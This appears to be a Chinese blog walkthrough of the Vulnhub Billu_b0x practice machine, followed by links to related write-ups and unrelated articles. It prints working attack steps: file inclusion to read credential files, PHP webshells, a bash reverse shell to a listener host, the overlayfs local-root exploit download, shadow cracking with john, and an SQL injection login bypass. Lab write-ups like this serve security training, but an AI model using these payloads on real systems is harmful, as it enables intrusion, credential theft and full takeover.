1、信息收集

1.1、获取IP地址:

map scan report for 192.168.118.137

Host is up (0.00017s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))

MAC Address: 00:0C:29:69:99:DF (VMware)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2、dirb目录爆破

root@kali:~# dirb "http://192.168.118.137" /usr/share/dirb/wordlists/big.txt -o  test.txt

-----------------

DIRB v2.22

By The Dark Raver

-----------------

OUTPUT_FILE: test.txt

START_TIME: Tue Nov 20 09:41:59 2018

URL_BASE: http://192.168.118.137/

WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.118.137/ ----

+ http://192.168.118.137/add (CODE:200|SIZE:307)

+ http://192.168.118.137/c (CODE:200|SIZE:1)

+ http://192.168.118.137/cgi-bin/ (CODE:403|SIZE:291)

+ http://192.168.118.137/head (CODE:200|SIZE:2793)

==> DIRECTORY: http://192.168.118.137/images/

+ http://192.168.118.137/in (CODE:200|SIZE:47559)

+ http://192.168.118.137/index (CODE:200|SIZE:3267)

+ http://192.168.118.137/panel (CODE:302|SIZE:2469)

==> DIRECTORY: http://192.168.118.137/phpmy/

+ http://192.168.118.137/server-status (CODE:403|SIZE:296)

+ http://192.168.118.137/show (CODE:200|SIZE:1)

+ http://192.168.118.137/test (CODE:200|SIZE:72)

==> DIRECTORY: http://192.168.118.137/uploaded_images/                         

---- Entering directory: http://192.168.118.137/images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/ ----

+ http://192.168.118.137/phpmy/ChangeLog (CODE:200|SIZE:28878)

+ http://192.168.118.137/phpmy/LICENSE (CODE:200|SIZE:18011)

+ http://192.168.118.137/phpmy/README (CODE:200|SIZE:2164)

+ http://192.168.118.137/phpmy/TODO (CODE:200|SIZE:190)

+ http://192.168.118.137/phpmy/changelog (CODE:200|SIZE:8367)

==> DIRECTORY: http://192.168.118.137/phpmy/contrib/

+ http://192.168.118.137/phpmy/docs (CODE:200|SIZE:2781)

+ http://192.168.118.137/phpmy/export (CODE:200|SIZE:8367)

+ http://192.168.118.137/phpmy/favicon (CODE:200|SIZE:18902)

+ http://192.168.118.137/phpmy/favicon.ico (CODE:200|SIZE:18902)

+ http://192.168.118.137/phpmy/import (CODE:200|SIZE:8367)

+ http://192.168.118.137/phpmy/index (CODE:200|SIZE:8367)

==> DIRECTORY: http://192.168.118.137/phpmy/js/

==> DIRECTORY: http://192.168.118.137/phpmy/libraries/

+ http://192.168.118.137/phpmy/license (CODE:200|SIZE:8367)

==> DIRECTORY: http://192.168.118.137/phpmy/locale/

+ http://192.168.118.137/phpmy/main (CODE:200|SIZE:8367)

+ http://192.168.118.137/phpmy/navigation (CODE:200|SIZE:8367)

+ http://192.168.118.137/phpmy/phpinfo (CODE:200|SIZE:8367)

+ http://192.168.118.137/phpmy/phpmyadmin (CODE:200|SIZE:42380)

==> DIRECTORY: http://192.168.118.137/phpmy/pmd/

+ http://192.168.118.137/phpmy/print (CODE:200|SIZE:1064)

+ http://192.168.118.137/phpmy/robots (CODE:200|SIZE:26)

+ http://192.168.118.137/phpmy/robots.txt (CODE:200|SIZE:26)

==> DIRECTORY: http://192.168.118.137/phpmy/scripts/

==> DIRECTORY: http://192.168.118.137/phpmy/setup/

+ http://192.168.118.137/phpmy/sql (CODE:200|SIZE:8367)

==> DIRECTORY: http://192.168.118.137/phpmy/themes/

+ http://192.168.118.137/phpmy/url (CODE:200|SIZE:8367)

+ http://192.168.118.137/phpmy/webapp (CODE:200|SIZE:6917)                     

---- Entering directory: http://192.168.118.137/uploaded_images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/contrib/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/js/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/libraries/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/locale/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/pmd/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/scripts/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/setup/ ----

+ http://192.168.118.137/phpmy/setup/config (CODE:303|SIZE:0)

==> DIRECTORY: http://192.168.118.137/phpmy/setup/frames/

+ http://192.168.118.137/phpmy/setup/index (CODE:200|SIZE:12971)

==> DIRECTORY: http://192.168.118.137/phpmy/setup/lib/

+ http://192.168.118.137/phpmy/setup/scripts (CODE:200|SIZE:5169)

+ http://192.168.118.137/phpmy/setup/styles (CODE:200|SIZE:6941)

+ http://192.168.118.137/phpmy/setup/validate (CODE:200|SIZE:10)               

---- Entering directory: http://192.168.118.137/phpmy/themes/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/setup/frames/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.118.137/phpmy/setup/lib/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

-----------------

END_TIME: Tue Nov 20 09:42:34 2018

DOWNLOADED: 61374 - FOUND: 37

爆破出很多信息:

1、http://192.168.118.137/test

2、http://192.168.118.137/phpmy/phpinfo

3、http://192.168.118.137/phpmy/phpmyadmin

2、渗透测试

1、访问http://192.168.118.137/test 提示file参数:

2、GET测试不行,测试POST,发送POST有常用两种方式:

2.1、Hackbar

2.2、Burpsuite

Burpsuite-GET转换为POST:

Repeater-"charge request method"

3、测试出文件包含漏洞,用同样的方法下载爆破出来的其他文件

add.php、in.php、c.php、index.php、show.php、panel.php

代码审计c.php,发现mysql链接用户名、密码和链接的数据库:

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

还可以获取的信息系统的用户名和密码:

file=/var/www/phpmy/config.inc.php
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor'

4、用http://192.168.118.137/phpmy/登录数据库

获取web登录的用户名和密码  biLLu:hEx_it

5、登录web查看web的功能:

show users

add user

有上传图片功能,测试是否能上传一句话木马

3、获取shell

notepad++ 图片加入一句话木马
<?php system($_GET['cmd']); ?>

上传一个图片木马:

上传成功访问:

执行CMD命令:

include($dir.'/'.$_POST['load']);   include可以执行.php文件

POST /panel.php?cmd=cat%20/etc/passwd;ls HTTP/1.1

Host: 192.168.118.137

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://192.168.118.137/panel.php

Cookie: PHPSESSID=fpbnovc9pc3rlg2sfeies9j1f7

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 48

load=/uploaded_images/muma.jpg&continue=continue

执行反弹shell,需URL编码
echo "bash -i >& /dev/tcp/192.168.118.128/4444 0>&1" | bash

nc 反弹成功:

菜刀链接:
uploaded_images为写权限目录:
echo '<?php eval($_POST['123456']);?>' >> caidao.php

4、权限提升

提权到root:
www-data@indishell:/var/www$ cat /etc/issue
cat /etc/issue
Ubuntu 12.04.5 LTS \n \l

www-data@indishell:/var/www$ uname -a
uname -a
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
www-data@indishell:/var/www$

https://www.exploit-db.com/exploits/37292/
'overlayfs' Local Privilege Escalation-CVE-2015-1328

wget https://www.exploit-db.com/download/37292.c
chmod 777 37292.c
gcc 37292.c -o exp

Linux提取可以参考:

https://blog.csdn.net/qq_20307987/article/details/65443902

notepad:

根据系统版本号找对应exp

补充:

文件包含获取/etc/passwd和/etc/shadow 可以直接爆破root密码:

root@kali:~# unshadow passwd.txt shadow.txt >/tmp/unshadow.txt

root@kali:~# john --format=crypt  /tmp/unshadow.txt  --show

root:roottoor:0:0:root:/root:/bin/bash

1 password hash cracked, 1 left

SQL注入:
test文件包含获得index.php
(1) 审计index.php源码,发现以下过滤规则:
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
str_replace的作用是将字符串\’ 替换为空

因此构造SQL注入登录payload时,必须含有\’字符串,否则会报错。
urldecode的作用是将输入解码。
(2) 常见的利用注入登录的payload是’ or 1=1 — 修改这个在最后增加\’,str_replace会将这个\’替换为空。
使用php在线调试工具,测试如下:
<?php
echo str_replace('\'','',' or 1=1 --\'');
?>
payload:' or 1=1 -- \'

Vulnhub Billu_b0x的更多相关文章

  1. Billu_b0x内网渗透-vulnhub

    个人博客:点我 本次来试玩一下vulnhub上的Billu_b0x,只有一个flag,下载地址. 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题.靶场 ...

  2. Vulnhub靶场渗透练习(二) Billu_b0x

    运行虚拟机直接上nmap扫描 获取靶场ip nmap 192.168.18.* 开放端口 TCP 22 SSH OpenSSH 5.9p1 TCP 80 HTTP Apache httpd 2.2.2 ...

  3. 【Vulnhub练习】Billu_b0x

    靶机说明 虚拟机难度中等,使用ubuntu(32位),其他软件包有: PHP apache MySQL 目标 Boot to root:从Web应用程序进入虚拟机,并获得root权限. 运行环境 靶机 ...

  4. kali渗透综合靶机(八)--Billu_b0x靶机

    kali渗透综合靶机(八)--Billu_b0x靶机 靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip 一.主机发现 1.netdisco ...

  5. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  6. vulnhub writeup - 持续更新

    目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...

  7. Vulnhub Breach1.0

    1.靶机信息 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/C ...

  8. billu_b0x靶场刷题

    https://www.vulnhub.com/ 里面有很多安全环境,只要下载相关镜像,在虚拟机上面搭建运行就可以练习对应靶场了. 第一步.信息收集 nmap扫描内网开放80端口的存活主机  nmap ...

  9. HA Joker Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...

随机推荐

  1. hibernate查询出的实体,set值后,自动更新到数据库

    1.问题症状描述      最近在处理一个新需求问题,代码的大致逻辑是获取一个实体对象,调用该对象的set方法设置其中的某些字段,然后把修改后的实体作为参数供其他地方调用,根据返回值来决定是否更新这个 ...

  2. LevelDB Compaction操作

    [LevelDB Compaction操作] 对于LevelDb来说,写入记录操作很简单,删除记录仅仅写入一个删除标记就算完事,但是读取记录比较复杂,需要在内存以及各个层级文件中依照新鲜程度依次查找, ...

  3. out.println(session.getLastAccessedTime());的返回值到底是毛线意思???

    out.println(session.getLastAccessedTime());这个语句是输出最后一次成功获取session对象Attribute值的一个指令, 他的返回值是一个long型数据, ...

  4. 深入理解那该死的BOM

    BOM(Byte Order Mark),是UTF编码方案里用于标识编码的标准标记,在UTF-16里本来是FF FE,变成UTF-8就成了EF BB BF.这个标记是可选的,因为UTF8字节没有顺序, ...

  5. Rotate image and fit show use canvas

    Description In the field of image processing, We always to show image after modified the image raw d ...

  6. c++中冒号(:)和双冒号(::)的用法

    1.冒号(:)用法 (1)表示机构内位域的定义(即该变量占几个bit空间) typedef struct _XXX{ unsigned char a:4; unsigned char c; } ; X ...

  7. 8 种提升 ASP.NET Web API 性能的方法 (转)

    出处:http://www.oschina.net/translate/8-ways-improve-asp-net-web-api-performance ASP.NET Web API 是非常棒的 ...

  8. SpringMVC源码解析 - HandlerAdapter - HandlerMethodArgumentResolver

    HandlerMethodArgumentResolver主要负责执行handler前参数准备工作. 看个例子,红色部分的id初始化,填充值就是它干的活: @RequestMapping(value ...

  9. iOS7修改UISearchBar的Cancel按钮的颜色和文字

    两行代码搞定: [[UIBarButtonItem appearanceWhenContainedIn: [UISearchBar class], nil] setTintColor:[UIColor ...

  10. swift - 动画学习

    // //  ViewController.swift //  MapAnimation // //  Created by su on 15/12/10. //  Copyright © 2015年 ...